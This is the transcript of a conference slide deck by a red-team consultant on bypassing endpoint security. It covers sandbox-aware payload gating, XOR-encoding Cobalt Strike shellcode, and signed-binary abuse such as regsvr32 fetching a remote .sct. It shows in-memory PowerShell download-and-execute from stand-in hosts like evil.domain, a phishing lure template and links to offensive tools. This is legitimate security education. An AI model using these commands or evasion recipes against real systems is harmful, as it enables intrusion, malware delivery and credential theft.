Endpoint Bypass Charles Hamilton

1
© Mandiant, a FireEye Company. All rights reserved. CONFIDENTIAL
Bypassing Advanced Security Controls
Charles F. Hamilton
Senior consultant at Mandiant

View Slide

About me
• Charles F. Hamilton, Senior Consultant at Mandiant, OSCP, OSCE, GREM
• Founder of the RingZer0 Team online CTF since 2014
• 6+ years performing RedTeam/web application/Infrastructure testing for:
o Banks, Nuclear, Education
o Aerospace, Financial institutions, Insurance companies, Law firms
• Enjoy writing low-level language code (Assembly, C)
• Publicly published ~10 CVEs, ~100 of them unpublished

View Slide

Summary
0x1 The Reason Behind Evasions and Bypasses
0x2 Bypasses & Evasions VS Obfuscation
0x3 Using Custom Executable
0x4 Using Whitelisted Signed Binaries
0x5 The Case of PowerShell
0x6 Endpoint Solutions and Hooks
0x7 Phishing Your Way In
0x8 Targeting the Endpoint Security Product Itself

View Slide

0x1 The Reason Behind Evasion and Bypasses
Mature companies usually have several layers of protection to prevent attacks
e

View Slide

0x1 The Reason Behind Evasion and Bypasses
• To achieve untrusted code execution on a targeted workstation, an attacker
has to go through all of these layers
• The classic approach used to avoid being detected is to act differently when
executed on a security product. Usually by preventing the execution of the
malicious payload based on some fingerprinting
• An attacker that managed to bypass all of the security layers will be able to
execute code on the target system without being detected

View Slide

0x2 Bypasses & Evasions VS Obfuscation
Prioritize bypass and evasion over obfuscation
Examples:
$a = 3; // Original code
$a = 1 + 2; // Obfuscated
if(context == “sandbox”) { $a = 3; } else { exit() } // Evasion

View Slide

Problem with Sandbox solutions: They are fingerprintable and predictable
Differences between endpoints (workstations/servers) and sandboxes:
• Memory size (endpoint at least 4 Gb)
• Disk size (endpoint at least 250 Gb)
• Number of CPUs (endpoint at least 2 CPUs)
• Processes currently running (if you send the sample by email, is
OUTLOOK.exe running)
• Network access (does the sandboxes have network access)
• Joined to a domain (sandboxes are usually not joined to the corporate
domain)
• Time zone (Targeting a Canadian company)
• Detecting hook (Sandboxes usually hook known APIs functions)
• …

View Slide

Let's build our malicious payload. In this case we are going to rely on Cobalt
Strike reverse HTTPS shellcode
The following snippet of code will simply run the shellcode as is:
There are two major issues:
▪ The shellcode is well-known, most solutions will catch it (network, and on-
disk analysis)
▪ The code always attempts to execute the malicious payload

View Slide

First step is to evade the shellcode detection. Simplest way to achieve this goal
is to encode it. Classic XOR is usually enough
The idea:
• Generate a random key (32 bit integer value DWORD)
• Use the key to xor each 32 bit chunk of the original shellcode
• Create a little assembly decryption stub that brute forces the key
• Jump to the decoded version of the shellcode
Key 0x2b403db7 0x2b403db7 0x2b403db7
⊕ ⊕ ⊕
Shellcode 0xfce88600 0x00006089 0xe531d264
= = =
Encoded 0xd7a8bbb7 0x2b405d3e 0xce71efd3

View Slide

Original payload
Encoded shellcode + decoder

View Slide

• Our payload is now AV, and IDS/IPS friendly.
• To evade live analysis we need to find a way to avoid launching the payload
in a sandbox environment.
• Check the user domain:

View Slide

Our final payload now looks like is

View Slide

Pros:
▪ This kind of payload will usually pass through pretty much everything except
for endpoint protection
▪ Flexible, you can create your own evasion/bypass technique
Cons:
▪ Since the endpoint is meeting all the requirements, it will execute the
payload the malicious code will be executed and potentially detected
▪ Your payload will be written to the target disk

View Slide

• Endpoint solutions rely on heuristic detection, pattern matching, behavior,
and enforced application whitelisting
• The idea behind this approach is using Windows signed binaries that can be
used to execute code

View Slide

Several Windows binaries have been identified as good candidates for
command execution:
▪ cdb.exe
▪ installutil.exe
▪ regsvr32.exe
▪ rundll32.exe
▪ msbuild.exe
▪ regasm.exe
▪ …
Methods to execute code through all these binaries are well documented.

View Slide

• cdb.exe is a Microsoft Windows signed binary that can be used to perform
applications debugging. The debugger also provides a functionality that can
be used to execute arbitrary command
echo .shell whoami | cdb.exe C:\windows\system32\ipconfig.exe

View Slide

• It is also possible to execute shellcode directly using other whitelisted
applications
regsvr32 /s /u /i:https://c2domain/payload.sct scrobj.dll
• This command will run payload.sct, which is a vbscript, and executes the
final payload only relying on trusted binaries

View Slide

Pros:
▪ Several whitelisting bypasses can be chained together to defeat endpoint
solutions
▪ For example, executing the binary that we’ve created in the previous section
using an application whitelisting bypass will probably pass through all the
security layers
Cons:
▪ These techniques are well known in the security industry, more advanced
endpoint security products now block these known applications even if they
are whitelisted
▪ Limited on the kind of payload you can execute
▪ Easy to prevent/block

View Slide

PowerShell is basically a built-in RAT for hackers and it comes with the
following features:
▪ In memory execution
▪ Full scripting engine
▪ Access to .NET language (C#)
▪ Access to Windows API
▪ Trusted Microsoft Windows signed binary

View Slide

• PowerShell allows you to execute PowerShell scripts in memory without
touching the disk
• IEX (Invoke-Expression):
IEX (New-Object Net.WebClient).DownloadString
("https://evil.domain/payload.ps1");
• Script Block:
$cmd = (New-Object
Net.WebClient).DownloadString("https://evil.domain/payload.ps1");
([ScriptBlock]::Create($cmd).Invoke();
• Manual Approach:
▪ Use PowerShell functionalities to get VirtualAlloc function pointer and CreateThread
▪ Copy your shellcode into the memory location
▪ The shellcode can be dynamically downloaded using Net.WebClient DownloadString method
▪ Jump to it using CreateThread and execute the shellcode

View Slide

21
• Executing code on a remote host without having credentials
• Kerberos tickets can be used within PowerShell context
PS> module-import .\Remote-WmiExecute.ps1; Remote-WmiExecute -ComputerName
victim01 -Payload "cmd.exe /c whoami"

View Slide

Most of the endpoint solutions rely on hooks at different levels:
• I/O
• Networking
• Windows APIs
Simply encrypt the payload a second time at the application level
Default PowerShell mimikatz.ps1
⊕
Encrypted using RC4
⊕
Send over HTTPS
⊕
Windows decrypt the HTTPS stream
⊕ Network hook
PowerShell RAT decrypt the RC4

View Slide


View Slide

To defeat on-disk activities is quite simple:
never write anything on disk
PowerShell in-memory can run pretty much everything, including binaries

View Slide

Five rules of successful phishing:
• Don’t put your malicious payload in the email
• Don’t allow automated solution to be able to access your final payload
• Use categorized domains
• Try to fingerprint your victim as much as possible
• Use HTTPS with a valid certificate (not self-signed)

View Slide

Rule #1: Don’t put your malicious payload in the email
• Usually sending the phishing email with a link to a server that we control
Hi Bob,
We are currently updating our code of conduct policy please review and accept
as soon as possible.
The code of conduct can be found here:
https://phishy.domain/company/code/a2ef362e-45d0-b21d-5abf-edce29d365cb/
Thank you,
Bobby from HR

View Slide

Rule #2: Don’t allow automated solutions to be able to access your final
payload:
Let’s assume the HTML on the website looks like this:
download the code of conduct
Automated security can easily parse the HTML and find the link to the
payload.
download the code of conduct
 document.getElementById("download").onclick = function() { document.location = "https://phish" + "y.domain/pay" + "load.docm"; }; document.getElementById("download").click(); 
The click event is now dynamically generated using JavaScript. Most of the
automated tools do not interpret the JavaScript and do not follow redirection.

View Slide

Rule #3: Use categorized domains:
• Before the assessment, simply clone a legitimate website and ask the
security products to categorize your domain
• Hunting for already categorized expired domains can be useful
Simple as that ☺

View Slide

Rule #4: Try to fingerprint your victim as much as possible:
• If you can fingerprint the domain used by the targeted company, adding a
check similar to the one used for binaries can also save you
• Based on the kind of solution they use, sometime a macro will provide better
result than HTA or ClickOnce
if(context != “sandbox”) { execute you final stage }
Rule #5: Use HTTPS with a valid certificate:
• Let’s Encrypt can provide you free certificate

View Slide

0x8 Targeting the Endpoint Security Product
Companies use different approaches to detect threats:
• Blacklisting known malicious binaries
• Hash based
• Heuristics
• …

View Slide

Certain solutions will blacklist known potential malicious files, even if they are
Microsoft Signed Binaries
• cdb.exe
• installutil.exe
• regsvr32.exe
• rundll32.exe
• msbuild.exe
• regasm.exe
They generally keep track of the binary hash (including old version such as
Windows 2000)

View Slide

Since the detection is hash based, changing a single byte will change the hash
and defeat it
Original:
59bce9f07985f8a4204f4d6554cff708
Modified:
432be6cf7311062633459eef6b242fb5

View Slide

• Certain file formats will be trusted more than others:
• Untrusted:
▪ exe
▪ ps1
▪ vbs
▪ docm, pdf
• Generally trusted:
▪ Images (PNG, BMP, JPG)
• Delivering shellcode inside valid polyglot images: most security
engines will not even bother analyzing images
▪ Tools exist: https://github.com/Mr-Un1k0d3r/DKMC

View Slide

Using PowerShell without relying on powershell.exe
Technique one:
C:\>copy
%SystemRoot%\system32\WindowsPowerShell\v1.0\powershell.exe
%temp%\randomname.txt
C:\>%temp%\randomname.txt –Exec bypass whoami
Technique two:
Use .Net (C# in this case) to invoke PowerShell DLLs directly without using
powershell.exe at all

View Slide

using System.Management.Automation;
Runspace runspace = RunspaceFactory.CreateRunspace();
runspace.Open();
RunspaceInvoke invoke = new RunspaceInvoke(runspace);
Pipeline pipe = runspace.CreatePipeline();
pipe.Commands.AddScript("PowerShell script goes here");
pipe.Commands.Add("Out-String");
Collection output = pipe.Invoke();

View Slide


View Slide

37
0x9 Tools
Search categorized domains https://github.com/Mr-Un1k0d3r/CatMyFish
RC4 ThunderShell RAT https://github.com/Mr-Un1k0d3r/ThunderShell
Polyglot image to deliver shellcode https://github.com/Mr-Un1k0d3r/DKMC
shellcode obfuscator https://github.com/Mr-Un1k0d3r/UniByAv
SCT obfuscator (Cobalt Strike, Empire) https://github.com/Mr-Un1k0d3r/SCT-
obfuscator
PowerShell execution without invoking PowerShell https://github.com/Mr-
Un1k0d3r/PowerLessShell
Malicious macro generator https://github.com/Mr-
Un1k0d3r/MaliciousMacroGenerator
Remote WMI execute script https://github.com/Mr-
Un1k0d3r/RedTeamPowershellScripts/blob/master/scripts/Remote-
WmiExecute.ps1

View Slide

38
EOF
Questions?
Thank you

View Slide

Endpoint Bypass Charles Hamilton

Endpoint Bypass Charles Hamilton

OWASP Montréal

More Decks by OWASP Montréal

Other Decks in Programming

Featured

Transcript